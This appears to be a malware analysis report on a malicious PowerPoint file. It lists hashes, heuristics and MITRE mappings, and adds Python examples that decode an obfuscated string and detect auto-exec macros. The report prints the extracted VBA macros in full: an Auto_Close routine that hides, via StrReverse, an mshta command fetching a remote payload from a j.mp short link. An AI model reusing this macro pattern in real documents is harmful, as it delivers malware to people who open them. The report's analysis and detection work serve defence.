Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 6395297bafa84cc5…

MALICIOUS

Office (OLE) / .PPT

Size: 72.5 KB
Created: 2006-08-16 00:00:00
Authoring application: Microsoft Office PowerPoint
First seen: 2026-05-13
MD5: 75a8c41e60845810c93904f5fa25ff68
SHA-1: 8d1f3c7f893d5e3bb01d319854fcbabe36c3698c
SHA-256: 6395297bafa84cc5d476a73fc5a432b62d9a50fa3ba14daf5eb63a91ddd897df
Risk score: 128

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a PowerPoint presentation carrying two VBA modules. Module2 defines Auto_Close, which runs when the presentation is closed and does nothing but call Calculator_Click in Module1. That routine builds its command with StrReverse over a literal whose doubled quotes ("") are VBA escapes, not padding; reversing the literal gives "mshta      ""https:\\j.mp\oapkcdoapckdadawa", so the Shell call launches mshta.exe (MITRE T1218.005, System Binary Proxy Execution: Mshta) against a j.mp (Bitly) short link written with backslashes, which Windows URL canonicalization normally accepts in place of forward slashes. The shortener's redirect target, and with it the real second-stage host and payload, cannot be recovered statically and is not present in this report. The '%SystemRoot%\system32\calc.exe line in Module1 is a comment and never executes: the routine has the shape of the stock VBA "launch an application" button sample, with the StrReverse call substituted for the original calc.exe path.
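
The obfuscated literal is the one thing in this sample worth decoding by hand, and the doubled-quote escapes are easy to get wrong. The following Python is an added example written for this report, not output of the analysis platform or of oletools: it parses the StrReverse argument as a VBA string literal (a doubled quote is one escaped quote, backslashes are ordinary characters), reverses it, and splits the result into program and argument, normalising the URL's backslashes to forward slashes. The sample line is copied from the extracted macros.bas below; the function names and the normalisation step are this example's own choices.

```python
import re

# Module1 line exactly as extracted by olevba from this sample (from macros.bas below).
SAMPLE_LINE = r'    stAppName = StrReverse("""awadadkcpaodckpao\pm.j\\:sptth""""      athsm""")'


def parse_vba_string(src: str, start: int) -> tuple:
    """Parse the VBA string literal whose opening quote is at src[start].

    VBA has a single in-literal escape: a doubled quote stands for one quote
    character. Backslashes are ordinary characters, which is why the sample's
    double backslash survives into the decoded value unchanged.
    Returns (value, index_just_past_the_closing_quote).
    """
    if src[start] != '"':
        raise ValueError("not positioned at a string literal")
    out = []
    i = start + 1
    while i < len(src):
        if src[i] == '"':
            if i + 1 < len(src) and src[i + 1] == '"':   # escaped quote
                out.append('"')
                i += 2
                continue
            return "".join(out), i + 1                    # closing quote
        out.append(src[i])
        i += 1
    raise ValueError("unterminated VBA string literal")


def decode_strreverse(line: str) -> list:
    """Return the plaintext of every StrReverse(<literal>) call on the line."""
    decoded = []
    for m in re.finditer(r'StrReverse\(\s*(?=")', line):
        literal, _ = parse_vba_string(line, m.end())
        decoded.append(literal[::-1])
    return decoded


def split_command(cmd: str) -> tuple:
    """Split a decoded Shell() string into (program, argument).

    The decoded value here is a quoted program name, filler whitespace and a
    quoted URL. Quotes are dropped, the tokens split on whitespace, and any
    backslashes in an http(s) argument are normalised to forward slashes (the
    way Windows URL canonicalisation treats them) so the IOC is searchable.
    This normalisation is this example's own choice, not part of the sample.
    """
    tokens = cmd.replace('"', " ").split()
    program = tokens[0].lower()
    argument = " ".join(tokens[1:])
    if re.match(r"https?:", argument, re.IGNORECASE):
        argument = argument.replace("\\", "/")
    return program, argument


def analyse(line: str = SAMPLE_LINE) -> dict:
    """Decode the line and report the command the Shell call would run."""
    decoded = decode_strreverse(line)[0]
    program, argument = split_command(decoded)
    return {"decoded": decoded, "program": program, "argument": argument}


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the decoded Shell string, the program mshta and the argument https://j.mp/oapkcdoapckdadawa. j.mp is Bitly's short-link domain, so the redirect target is what you actually need to pivot on, and it cannot be recovered from the document alone.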

Heuristics 4

  • VBA macros detected (medium), OLE_VBA_MACROS, 3 related findings
    Document contains VBA macro code.
  • Potential Shell call in VBA (critical), OLE_VBA_SHELL
    Matched line in script:
        Call Shell(stAppName, 1)
  • VBA p-code auto-exec with execution tokens (high), OLE_VBA_PCODE_AUTOEXEC_EXEC
    Fires on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only documents, or documents whose source extraction failed, where no VBA source is visible. In this sample the pair is Auto_Close (Module2) and Shell (Module1), both present in the extracted source below.
  • Auto_Close macro (low), OLE_VBA_AUTOCLOSE
    Matched line in script:
        Sub Auto_Close()
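
To make the pairing rule concrete, here is an added Python example (written for this report, not the platform's own detector) that applies the same two token lists to recovered macro text and fires only on co-occurrence. It is run against the two modules from this sample's macros.bas, copied below as constructed inputs and trimmed to their relevant lines, and against a benign Workbook_Open control. The example operates on decoded source text; the platform's rule runs on compiled p-code and cache streams, and applying this logic to the output of a p-code disassembler instead is an assumption of this example.

```python
import re

# Token lists copied from the heuristic description above.
AUTOEXEC_TOKENS = ["Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose"]
EXEC_TOKENS = ["Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro"]

# Constructed inputs: the two modules from this report's macros.bas, trimmed to
# their relevant lines, plus a benign control with an auto-exec entry point but
# no execution token.
MODULE1 = r'''Attribute VB_Name = "Module1"
Sub Calculator_Click()
    Dim stAppName As String
    stAppName = StrReverse("""awadadkcpaodckpao\pm.j\\:sptth""""      athsm""")
    Call Shell(stAppName, 1)
End Sub
'''
MODULE2 = '''Attribute VB_Name = "Module2"
Sub Auto_Close()
Calculator_Click
End Sub
'''
BENIGN = '''Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    Sheets(1).Range("A1").Value = "opened"
End Sub
'''


def find_tokens(text: str, tokens: list) -> list:
    """Return the listed tokens that occur in text as whole identifiers.

    VBA is case-insensitive, so the match is too. The lookarounds stop 'Shell'
    matching inside 'PowerShell' or 'ShellExecute' (both listed on their own),
    and re.escape keeps the dots in cmd.exe / ADODB.Stream literal.
    """
    hits = []
    for tok in tokens:
        pattern = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pattern, text, re.IGNORECASE):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(text: str) -> dict:
    """Apply the pairing rule to the recovered text of one stream or project.

    Fires only when an auto-exec entry point AND an execution token are both
    present; either group alone is reported in the result but does not fire.
    """
    autoexec = find_tokens(text, AUTOEXEC_TOKENS)
    execs = find_tokens(text, EXEC_TOKENS)
    return {"fires": bool(autoexec and execs), "autoexec": autoexec, "exec": execs}


if __name__ == "__main__":
    print("whole project:", pcode_autoexec_exec(MODULE1 + MODULE2))
    print("Module1 only: ", pcode_autoexec_exec(MODULE1))
    print("Module2 only: ", pcode_autoexec_exec(MODULE2))
    print("benign:       ", pcode_autoexec_exec(BENIGN))
```

Note the scope caveat this sample itself demonstrates: Auto_Close lives in Module2 and Shell in Module1, so scanning each module stream in isolation yields no hit, and the pairing only appears when the project's streams are evaluated together, as the concatenated call shows.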

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 510 bytes
SHA-256: 471cb0416b0d296bda4d0432108f5ef726a483b6eeb57fffdfa39a12c6497894

Extracted script (first 1,000 lines):
Attribute VB_Name = "Module1"
Sub Calculator_Click()

    '%SystemRoot%\system32\calc.exe

    On Error GoTo Err_Calculator_Click

    Dim stAppName As String

    stAppName = StrReverse("""awadadkcpaodckpao\pm.j\\:sptth""""      athsm""")

    Call Shell(stAppName, 1)

Exit_Calculator_Click:

    Exit Sub

Err_Calculator_Click:

    MsgBox Err.Description

    Resume Exit_Calculator_Click

End Sub



Attribute VB_Name = "Module2"
Sub Auto_Close()
Calculator_Click
End Sub